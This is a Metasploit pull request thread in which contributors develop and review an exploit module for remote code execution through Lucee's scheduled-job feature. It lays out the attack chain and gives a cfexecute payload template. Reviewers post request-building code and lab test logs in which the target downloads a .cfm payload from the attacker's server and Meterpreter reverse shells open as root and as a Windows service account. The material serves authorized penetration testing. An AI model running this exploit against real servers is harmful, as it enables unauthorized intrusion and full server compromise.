Lucee Scheduled Job RCE
rapid7/metasploit-framework pull request #17638
Opened 2023-02-13 21:46 UTC by JBince

Lucee is an Open Source ColdFusion server/engine intended for rapid web development. Many implementations of
ColdFusion files support dynamic input and server side code execution.
In the case of this module, Lucees implementation supports the use of `cfexecute` and `cfscript` tags in `.cfm` files.

In addition to these features, Lucee provides a scheduled job feature. This feature will accept an
external `url` argument and query that page on execution. If logging is enabled, it is possible to
query a remote ColdFusion document, log it in the web root, and access it to execute its code,
subsequently achieving arbitrary server side code execution. The series of requests to achieve this is as follows.

1. Authenticate as the administrator to the web admin panel
2. Create a scheduled job that includes a URL to the remote ColdFusion document
3. Update the scheduled job to turn on logging and ensure that the remote document is logged to the web root
4. Execute the scheduled job. The Lucee server will now reach out to and download the ColdFusion document from the attackers server
5. Access the document at the web root of the server, thus executing the payload.

The basic format for the remote ColdFusion document is as follows.

```html
<cfscript>
            cfexecute(name="powershell.exe", arguments="-c whoami",timeout=5);
</cfscript>

## Verification

List the steps needed to make sure this thing works

Exact steps may vary depending on the choice of payload. However, a general outline for receiving a reverse shell (independent of platform) is below.

1. Download and install Lucee from the vendors website. This can be done on either a Windows or Unix host.
   No additional setup is needed beyond the initial installation walkthrough
2. Start MSF Console
3. Do: `use multi/http/lucee_scheduled_job_rce`
4. Choose a target that reflects the target system
	- `use X` (0 for Windows, 1 for Linux)
5. Select payload. This functions with command execution payloads and supports reverse shells and generic commands.
6. Select the desired payload and complete its requirement. `CMD`, `LHOST`, `LPORT`, etc.
7. Select the appropriate `RHOST`. `PASSWORD`, and (if necessary), the `TARGETURI`
8. Execute the payload. You should either receive a shell or see the output of your command.

For the sake of demonstration, I've included a quick demo video in an email titled _Lucee Scheduled Jobs RCE_

Setting up a testing environment does not require any additional setup or configuration beyond the initial installation walkthrough. Downloads for both Windows and Unix can be found [here](https://download.lucee.org/)

Thank you, and I'm looking forward to hearing back!

2023-02-16 16:00 UTC, gwillcox-r7 requested changes

2023-02-17 14:17 UTC, JBince commented
I've updated the module and docs based on your earlier feedback and I've made sure to run rubocop and msftidy on it. Thanks!

2023-02-17 14:59 UTC, smcintyre-r7 requested changes
Alright I left a few comments. I also tested this on a Linux target and couldn't get it to work. I suspect it has to do with the webroot being in a different path. If that's the case, the exploit will need some way to either adapt automatically or leak the correct value.

I'm watching the logs and this is what I get:
<details>
<summary>Log Excerpt</summary>
When I check for `/srv/www/app/webroot/Lry59JyoHamgc.cfm` I see that it does not exist so that probably has something to do with the error.

```
...
7-Feb-2023 14:17:29.296 INFO [main] org.apache.jasper.servlet.TldScanner.scanJars At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by org.apache.felix.framework.ext.ClassPathExtenderFactory$DefaultClassLoaderExtender (file:/srv/www/catalina-base/lib/5.3.10.97.jar) to method java.net.URLClassLoader.addURL(java.net.URL)
WARNING: Please consider reporting this to the maintainers of org.apache.felix.framework.ext.ClassPathExtenderFactory$DefaultClassLoaderExtender
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
17-Feb-2023 14:17:31.655 INFO [main] org.apache.coyote.AbstractProtocol.start Starting ProtocolHandler ["http-nio-8080"]
17-Feb-2023 14:17:31.673 INFO [main] org.apache.catalina.startup.Catalina.start Server startup in [2796] milliseconds
lucee.runtime.exp.MissingIncludeException: Page /Lry59JyoHamgc.cfm [/srv/www/app/webroot/Lry59JyoHamgc.cfm] not found
	at lucee.runtime.PageSourceImpl.loadPage(PageSourceImpl.java:1027)
	at lucee.runtime.PageContextImpl._doInclude(PageContextImpl.java:1051)
	at lucee.runtime.PageContextImpl._doInclude(PageContextImpl.java:948)
	at lucee.runtime.listener.ClassicAppListener._onRequest(ClassicAppListener.java:65)
	at lucee.runtime.listener.MixedAppListener.onRequest(MixedAppListener.java:45)
	at lucee.runtime.PageContextImpl.execute(PageContextImpl.java:2493)
	at lucee.runtime.PageContextImpl._execute(PageContextImpl.java:2478)
	at lucee.runtime.PageContextImpl.executeCFML(PageContextImpl.java:2449)
	at lucee.runtime.engine.Request.exe(Request.java:45)
	at lucee.runtime.engine.CFMLEngineImpl._service(CFMLEngineImpl.java:1216)
	at lucee.runtime.engine.CFMLEngineImpl.serviceCFML(CFMLEngineImpl.java:1162)
	at lucee.loader.engine.CFMLEngineWrapper.serviceCFML(CFMLEngineWrapper.java:97)
	at lucee.loader.servlet.CFMLServlet.service(CFMLServlet.java:51)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:779)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)
	at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)
	at org.apache.catalina.filters.RemoteIpFilter.doFilter(RemoteIpFilter.java:937)
	at org.apache.catalina.filters.RemoteIpFilter.doFilter(RemoteIpFilter.java:994)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:177)
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)
	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
...
```
</details>

<details>
<summary>I built my target environment using https://github.com/isapir/lucee-docker.</summary>

Run this to build it:
```
docker image build .       \             
    -t isapir/lucee-8080    \
    --build-arg LUCEE_ADMIN_PASSWORD=changeit
```
Then run this to start it:
```
docker run -p 8080:8080 isapir/lucee-8080
```
</details>

Once I can get it working, I'd like to look more closely at this warning:

> NOTE: Lucee's implementation of ColdFusion does not handle staged payloads well. Use them at your own discretion.

I'm thinking that may have to do with the page waiting for the payload to exit and return which we can probably get around. I'll be able to dig into it more though once the exploit is working.

2023-02-17 14:59 UTC, smcintyre-r7 commented on modules/exploits/multi/http/lucee_scheduled_job.rb
> +    })
```suggestion
    cleanup_request = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'vars_get' => {
        'action' => 'services.schedule',
      },
      'vars_post' => {
        'row_1' => '1',
        'name_1' => payload_base.to_s,
        'mainAction' => 'delete'
      }
    })
```

2023-02-17 14:59 UTC, smcintyre-r7 commented on modules/exploits/multi/http/lucee_scheduled_job.rb
> +    exploit_url = "http://#{srv_host}:#{datastore['SRVPORT']}/#{payload_base}.cfm"
You actually want to use [`#get_uri`](https://github.com/rapid7/metasploit-framework/blob/292c160abf0aa3f7643c86024c0463cf901548e4/lib/msf/core/exploit/remote/http_server.rb#L424) from the HttpServer mixin. It treats SRVHOST as the address to bind to and allows the user to set the host the target requests by setting URIHOST.

2023-02-17 14:59 UTC, smcintyre-r7 commented on modules/exploits/multi/http/lucee_scheduled_job.rb
> +      'vars_post' => {
```suggestion
      'uri' => normalize_uri(target_uri.path),
      'keep_cookies' => true,
      'vars_get' => {
        'action' => 'services.schedule',
        'action2' => 'create'
      },
      'vars_post' => {
```

2023-02-17 14:59 UTC, smcintyre-r7 commented on modules/exploits/multi/http/lucee_scheduled_job.rb
> +    if (datastore['SRVHOST'] == '0.0.0.0' || datastore['SRVHOST'] == '::')
You want to use something like this to handle the variations correctly.
```suggestion
    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
```

Really though this should be handled by `get_uri` though and shouldn't be necessary at all.

2023-02-17 14:59 UTC, smcintyre-r7 commented on modules/exploits/multi/http/lucee_scheduled_job.rb
> +      'keep_cookies' => true,
This should also be moved into `vars_get` so it's encoded as necessary.

2023-02-17 14:59 UTC, smcintyre-r7 commented on modules/exploits/multi/http/lucee_scheduled_job.rb
> +    end
This breaks out the Failure codes to be more clear.
```suggestion
    fail_with(Failure::Unreachable, 'Could not connect to the web service') if update_job.nil?
    fail_with(Failure::UnexpectedReply, 'Unable to update job') unless update_job.code == 302 || update_job.code == 200

   print_good('Job ' + payload_base + ' updated successfully')
```

2023-02-17 14:59 UTC, smcintyre-r7 commented on modules/exploits/multi/http/lucee_scheduled_job.rb
> +    end
Same here with the failure codes.

```suggestion
    fail_with(Failure::Unreachable, 'Could not connect to the web service') if job_execution.nil?
    fail_with(Failure::Unknown, 'Unable to execute job') unless job_execution.code == 302 || job_execution.code == 200
      
    print_good('Job ' + payload_base + ' executed successfully')
```

2023-02-17 14:59 UTC, smcintyre-r7 commented on modules/exploits/multi/http/lucee_scheduled_job.rb
> +    print_good('Payload ' + payload_base + ' executed.')
In my testing this is stating that the payload was executed when it infact did not. The server is returning a 404 error, and there's an exception in the logs.

2023-02-17 14:59 UTC, smcintyre-r7 commented on modules/exploits/multi/http/lucee_scheduled_job.rb
> +      'vars_post' => {
```suggestion
      'uri' => normalize_uri(target_uri.path),
      'vars_get' => {
        'action' => 'services.schedule'
      }
      'vars_post' => {
```

2023-02-17 14:59 UTC, smcintyre-r7 commented on modules/exploits/multi/http/lucee_scheduled_job.rb
> +    end
It also seems like it'd make sense to check that you could create the job *before* attempting to update it. I'd change this block to the following then rearrange it to be before the update.

```suggestion
    fail_with(Failure::Unreachable, 'Could not connect to the web service') if create_job.nil?
    fail_with(Failure::UnexpectedReply, 'Unable to create job') unless create_job.code == 302
    
    print_good('Job ' + payload_base + ' created successfully')
```

2023-02-19 15:19 UTC, JBince commented
I've made updates to the module based on your feedback. 

In regards to the webroot path finding, I've added a function that pulls the leaked value from the homepage of the admin panel. At present, it's working great for me on Windows, Linux, and Docker hosts because of this change.

Despite experimenting with it, I haven't had much luck with staged payloads. Please let me know your thoughts on this. Thank you!

2023-02-23 19:43 UTC, smcintyre-r7 commented
I'm using the same environment for testing and it's still not working. I can see that the file is being placed in the webroot, and that it contains the error information, but the payload does not appear to be executing.

<details>
<summary>Testing Output</summary>

```
[1m[34m[*][0m Spooling to file /tmp/output.txt...
[4mmsf6[0m exploit([1m[31mmulti/http/lucee_scheduled_job[0m) [0m> show options 
[0m
Module options (exploit/multi/http/lucee_scheduled_job):

   Name           Current Setting       Required  Description
   ----           ---------------       --------  -----------
   EXECUTE_DELAY  1                     no        Time in seconds to wait before attempting to access the payload
   PASSWORD       changeit              no        The password for the administrative interface
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         192.168.159.128       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          8080                  yes       The target port (TCP)
   SRVHOST        0.0.0.0               yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT        8080                  yes       The local port to listen on.
   SSL            false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI      /lucee/admin/web.cfm  yes       The path to the admin interface.
   VHOST                                no        HTTP server virtual host


Payload options (cmd/unix/generic):

   Name  Current Setting   Required  Description
   ----  ---------------   --------  -----------
   CMD   touch /tmp/pwned  yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   1   Unix Command



View the full module info with the [32minfo[0m, or [32minfo -d[0m command.

[4mmsf6[0m exploit([1m[31mmulti/http/lucee_scheduled_job[0m) [0m> show optionspool /tmp/output.txtrun HttpTrace=true verbose=true
[0m
[1m[32m[+][0m touch /tmp/pwned
####################
# Request:
####################
[0m[1m[31mPOST /lucee/admin/web.cfm HTTP/1.1
Host: 192.168.159.128:8080
User-Agent: Mozilla/5.0 (iPad; CPU OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

login_passwordweb=changeit&lang=en&rememberMe=s&submit=submit[0m
####################
# Response:
####################
[0m[1m[34mHTTP/1.1 200
Set-Cookie: cfid=8dff897b-85c4-4fc8-9bbc-9d48d03c96fa;Path=/;Expires=Sat, 22-Feb-2053 03:30:18 UTC;HttpOnly;SameSite=Strict, cftoken=0;Path=/;Expires=Sat, 22-Feb-2053 03:30:18 UTC;HttpOnly;SameSite=Strict, LUCEE_ADMIN_LANG=en;Path=/, LUCEE_ADMIN_LANG=en;Path=/;Expires=Sat, 22-Feb-2053 03:30:18 UTC, LUCEE_ADMIN_PW_WEB=;Path=/;Expires=Thu, 23-Feb-2023 19:38:48 UTC, LUCEE_ADMIN_LASTPAGE=overview;Path=/;Expires=Sat, 22-Feb-2053 03:30:18 UTC
Content-Type: text/html;charset=UTF-8
Content-Length: 25677
Date: Thu, 23 Feb 2023 19:38:48 GMT

<!DOCTYPE html>

<html>
<head>
	<title>Lucee 5.3.10.97 - Overview - Lucee Web Administrator</title>
	<link rel="stylesheet" href="../res/css/admin-174fb5edd7b0bfbd.css.cfm" type="text/css">
	<meta name="robots" content="noindex,nofollow">
	
</head>



<body id="body" class="admin-web web" onload="">
	<div id="layout">
		<table id="layouttbl">
			<tbody>
				<tr id="tr-header">	
					<td colspan="2">
						<div id="header">
							
							<a id="logo" class="sprite" href="web.cfm"></a>
							<div id="admin-tabs" class="clearfix">
								<a href="server.cfm" class="sprite server"></a>
								<a href="web.cfm" class="sprite web"></a>
							</div>
						</div>	
					</td>
				</tr>
				<tr>
				
					<td id="navtd" class="lotd">
						<div id="nav">
							<a href="#" id="resizewin" class="sprite" title="resize window"></a>

								<form method="get" action="/lucee/admin/web.cfm">
									<input type="hidden" name="action" value="admin.search">
									<input type="text" name="q" size="15"  class="navSearch" id="lucee-admin-search-input" placeholder="SEARCH">
									<button type="submit" class="sprite  btn-search"></span></button>
									
								</form>

								<ul id="menu"><li id="nav_Overview"><a href="#">Overview</a><ul><li><a class="menu_inactive" href="web.cfm?action=overview"> Overview</a></li></ul></li><li id="nav_Info"><a href="#">Info</a><ul><li><a class="menu_inactive" href="web.cfm?action=info.bundle"> Bundle (jar)</a></li></ul></li><li id="nav_Settings"><a href="#">Settings</a><ul><li><a class="menu_inactive" href="web.cfm?action=server.cache"> Performance/Caching</a></li><li><a class="menu_inactive" href="web.cfm?action=server.compiler"> Language/Compiler</a></li><li><a class="menu_inactive" href="web.cfm?action=server.security"> Security</a></li><li><a class="menu_inactive" href="web.cfm?action=server.regional"> Regional</a></li><li><a class="menu_inactive" href="web.cfm?action=server.charset"> Charset</a></li><li><a class="menu_inactive" href="web.cfm?action=server.scope"> Scope</a></li><li><a class="menu_inactive" href="web.cfm?action=server.request"> Request</a></li><li><a class="menu_inactive" href="web.cfm?action=server.output"> Output</a></li><li><a class="menu_inactive" href="web.cfm?action=server.error"> Error</a></li><li><a class="menu_inactive" href="web.cfm?action=server.logging"> Logging</a></li><li><a class="menu_inactive" href="web.cfm?action=server.regex"> Regex</a></li><li><a class="menu_inactive" href="web.cfm?action=server.export"> Export</a></li></ul></li><li id="nav_Services"><a href="#">Services</a><ul><li><a class="menu_inactive" href="web.cfm?action=services.gateway"> Event Gateway</a></li><li><a class="menu_inactive" href="web.cfm?action=services.cache"> Cache</a></li><li><a class="menu_inactive" href="web.cfm?action=services.datasource"> Datasource</a></li><li><a class="menu_inactive" href="web.cfm?action=services.orm"> ORM</a></li><li><a class="menu_inactive" href="web.cfm?action=services.search"> Search</a></li><li><a class="menu_inactive" href="web.cfm?action=services.mail"> Mail</a></li><li><a class="menu_inactive" href="web.cfm?action=services.tasks"> Tasks</a></li><li><a class="menu_inactive" href="web.cfm?action=services.schedule"> Scheduled tasks</a></li></ul></li><li id="nav_Extension"><a href="#">Extension</a><ul><li><a class="menu_inactive" href="web.cfm?action=ext.applications"> Applications</a></li><li><a class="menu_inactive" href="web.cfm?action=ext.providers"> Providers</a></li></ul></li><li id="nav_Archives__amp__Resources"><a href="#">Archives &amp; Resources</a><ul><li><a class="menu_inactive" href="web.cfm?action=resources.mappings"> Mappings</a></li><li><a class="menu_inactive" href="web.cfm?action=resources.rest"> Rest</a></li><li><a class="menu_inactive" href="web.cfm?action=resources.component"> Component</a></li><li><a class="menu_inactive" href="web.cfm?action=resources.customtags"> Custom tags</a></li><li><a class="menu_inactive" href="web.cfm?action=resources.cfx_tags"> CFX tags</a></li></ul></li><li id="nav_Debugging"><a href="#">Debugging</a><ul><li><a class="menu_inactive" href="web.cfm?action=debugging.settings"> Settings</a></li><li><a class="menu_inactive" href="web.cfm?action=debugging.templates"> Templates</a></li><li><a class="menu_inactive" href="web.cfm?action=debugging.logs"> Logs</a></li></ul></li><li id="nav_Security"><a href="#">Security</a><ul><li><a class="menu_inactive" href="web.cfm?action=security.password"> Password</a></li></ul></li><li id="nav_Plugins"><a href="#">Plugins</a><ul><li><a class="menu_inactive" href="web.cfm?action=plugin&plugin=Note"> Note</a></li></ul></li></ul>
						</div>
					</td>
				
					<td id="contenttd" c [...]

2023-02-23 20:22 UTC, JBince commented
Thank you for letting me know. I will look into this further. Apologies for the issues.

2023-02-27 17:17 UTC, JBince commented
Based on the logs you added, I believe that the issue is the exploit trying to query the server for the payload file in the webroot before it's completely downloaded/available. I've reworked the logic so it awaits an acceptable response, rather than failing with the 404. It only waits as long as the `PAYLOAD_DEPLOY_DELAY` parameter dictates, based on the example you sent to me.

On the staged payload front: I now have staged Unix payloads working, but would appreciate any input on staged Windows payloads. Thank you again for your patience and your assistance in the Metasploit slack!

2023-02-28 22:41 UTC, smcintyre-r7 commented
@JBince I submitted a pull request to you with some changes in https://github.com/JBince/metasploit-framework/pull/1 from all the testing I did. All the payloads and targets I tested have been working just fine. Are you still running into issues where staged payloads aren't working all the time? If so let me know what payload and target you're using because I'd like to look into it more. It's quite possible that the changes we've made have already fixed the issue, so I wouldn't be surprised either way :crossed_fingers:

2023-03-01 01:59 UTC, JBince commented
Wonderful, glad we got that all ironed out. I've checked those changes and pulled them onto the branch. I've also updated the docs and pushed that. The branch should now be current with everything needed. Thank you!

On the staged payload front: The only issue I'm seeing is with any non-meterpreter staged PowerShell Payload on a Windows host. I'm testing it on a Windows 10 target. Staged payload work great on Unix machines and I've had no issues with Meterpreter payloads on Windows, so it's only the non-meterpreter Windows payloads that are the issue.

2023-03-01 15:06 UTC, smcintyre-r7 commented
I'm trying out the exploit with the `cmd/windows/powershell/shell/reverse_tcp` payload and it's not working. I'm getting this error where it says the encoded stage fails:

```
msf6 exploit(multi/http/lucee_scheduled_job) > run

[*] Started reverse TCP handler on 192.168.159.128:5555 
[+] Authenticated successfully
[*] Using URL: http://192.168.159.128:8081/NomhIYYRFa.cfm
[+] Job NomhIYYRFa created successfully
[+] Job NomhIYYRFa updated successfully
[*] Executing scheduled job: NomhIYYRFa
[+] Job NomhIYYRFa executed successfully
[*] Attempting to access payload...
[*] Payload request received for /NomhIYYRFa.cfm?RequestTimeout=50 from 192.168.159.10
[*] Attempting to access payload...
[!] StageEncoder failed, falling back to no encoding
[*] Sending encoded stage (0 bytes) to 192.168.159.10
[+] Received 200 response from NomhIYYRFa.cfm
[+] Exploit completed.
[*] Removing scheduled job NomhIYYRFa
[+] Scheduled job removed.
```

And the session is never opened. Is that what you're seeing as well? I know what's wrong and need to get it fixed either way but it's unrelated to your module here. If you're experiencing a different problem though, could you send me exactly which payload you're seeing it with and what the output is?

2023-03-01 15:10 UTC, JBince commented
Correct; that's the exact payload I'm referring to and that is the exact output I'm receiving, sorry for not specifying. So yes, what you're seeing there is exactly my issue. If that's unrelated to the module, then everything on the branch is current and good to go!

2023-03-02 13:56 UTC, smcintyre-r7 approved these changes
Perfect thanks for clarifying. I was able to track that issue down to #17720 and get a fix proposed in #17721. Once that's landed this module and others will be fixed. I'm glad we were able to get to the bottom of that.

Having sorted that out, this is ready to go do I'll get it landed. Thanks alot for this submission!

<details>
<summary>Testing Output</summary>

### Windows Target

```
msf6 exploit(multi/http/lucee_scheduled_job) > show options 

Module options (exploit/multi/http/lucee_scheduled_job):

   Name                    Current Setting       Required  Description
   ----                    ---------------       --------  -----------
   PASSWORD                changeit              no        The password for the administrative interface
   PAYLOAD_DEPLOY_TIMEOUT  20                    no        Time in seconds to wait for access to the payload
   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                  192.168.159.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                   8888                  yes       The target port (TCP)
   SRVHOST                 0.0.0.0               yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT                 8080                  yes       The local port to listen on.
   SSL                     false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                       no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI               /lucee/admin/web.cfm  yes       The path to the admin interface.
   VHOST                                         no        HTTP server virtual host


Payload options (cmd/windows/powershell/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/lucee_scheduled_job) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(multi/http/lucee_scheduled_job) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[+] Authenticated successfully
[*] Using URL: http://192.168.159.128:8080/Hxm8DQMYNkF.cfm
[+] Job Hxm8DQMYNkF created successfully
[+] Job Hxm8DQMYNkF updated successfully
[*] Executing scheduled job: Hxm8DQMYNkF
[+] Job Hxm8DQMYNkF executed successfully
[*] Attempting to access payload...
[*] Payload request received for /Hxm8DQMYNkF.cfm?RequestTimeout=50 from 192.168.159.10
[*] Attempting to access payload...
[*] Sending stage (175686 bytes) to 192.168.159.10
[+] Deleted C:\lucee\tomcat\webapps\ROOT\Hxm8DQMYNkF.cfm
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49807) at 2023-03-02 08:50:08 -0500
[*] Received 500 response from Hxm8DQMYNkF.cfm
[+] Exploit completed.
[*] Removing scheduled job Hxm8DQMYNkF
[+] Scheduled job removed.
[*] Server stopped.

meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 7
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.10 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/http/lucee_scheduled_job) >
```

### Linux (Docker) Target

```
msf6 exploit(multi/http/lucee_scheduled_job) > show options 

Module options (exploit/multi/http/lucee_scheduled_job):

   Name                    Current Setting       Required  Description
   ----                    ---------------       --------  -----------
   PASSWORD                changeit              no        The password for the administrative interface
   PAYLOAD_DEPLOY_TIMEOUT  20                    no        Time in seconds to wait for access to the payload
   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][
                                                           ...]
   RHOSTS                  192.168.159.128       yes       The target host(s), see https://docs.metasploit.com/docs
                                                           /using-metasploit/basics/using-metasploit.html
   RPORT                   8888                  yes       The target port (TCP)
   SRVHOST                 0.0.0.0               yes       The local host or network interface to listen on. This m
                                                           ust be an address on the local machine or 0.0.0.0 to lis
                                                           ten on all addresses.
   SRVPORT                 8080                  yes       The local port to listen on.
   SSL                     false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                       no        Path to a custom SSL certificate (default is randomly ge
                                                           nerated)
   TARGETURI               /lucee/admin/web.cfm  yes       The path to the admin interface.
   VHOST                                         no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Unix Command



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/lucee_scheduled_job) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[+] Authenticated successfully
[*] Using URL: http://192.168.159.128:8080/mZEAi7X9.cfm
[+] Job mZEAi7X9 created successfully
[+] Job mZEAi7X9 updated successfully
[*] Executing scheduled job: mZEAi7X9
[+] Job mZEAi7X9 executed successfully
[*] Attempting to access payload...
[*] Payload request received for /mZEAi7X9.cfm?RequestTimeout=50 from 172.17.0.2
[*] Attempting to access payload...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/meterpreter.py is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (24716 bytes) to 172.17.0.2
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[+] Deleted /srv/www/app/webroot/mZEAi7X9.cfm
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 172.17.0.2:44106) at 2023-03-02 08:53:32 -0500
[*] Received 500 response from mZEAi7X9.cfm
[+] Exploit completed.
[*] Removing scheduled job mZEAi7X9
[+] Scheduled job removed.
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : 585ebb5967cc
OS              : Linux 6.1.13-100.fc36.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 22 18:13:06 UTC 2023
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > pwd
/srv/www
meterpreter > 
```
</details>

2023-03-02 13:58 UTC, merged

2023-03-02 14:24 UTC, JBince commented
Thank you!